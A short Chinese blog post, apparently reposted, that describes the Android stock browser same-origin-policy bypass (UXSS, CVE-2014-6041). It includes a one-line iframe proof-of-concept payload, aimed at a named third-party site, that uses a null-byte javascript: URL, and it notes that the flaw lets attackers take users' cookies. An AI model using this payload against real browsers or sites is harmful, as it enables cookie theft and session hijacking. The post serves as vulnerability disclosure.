安卓内置浏览器跨域漏洞（UXSS） – 网站安全

相关链接：http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html

测试链接：http://x7s.pw/001.html

<iframe name="m" src="https://www.foxck.com/" onload="window.open('\u0000javascript：alert(document.location)','m')" >

成因：因为安卓内置的浏览器使用的是旧版的Chromium内核，所以引入了旧版本的历史漏洞（新版本已修复），利用此漏洞可轻易获取用户网站的cookie，各种调用安卓内置浏览器的浏览器及app躺枪！

安卓内置浏览器跨域漏洞（UXSS） – 网站安全 – 自插图

CVE-2014-6041

摘自：http://zone.wooyun.org/content/14945

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了，原文地址《安卓内置浏览器跨域漏洞（UXSS） – 网站安全 – 自》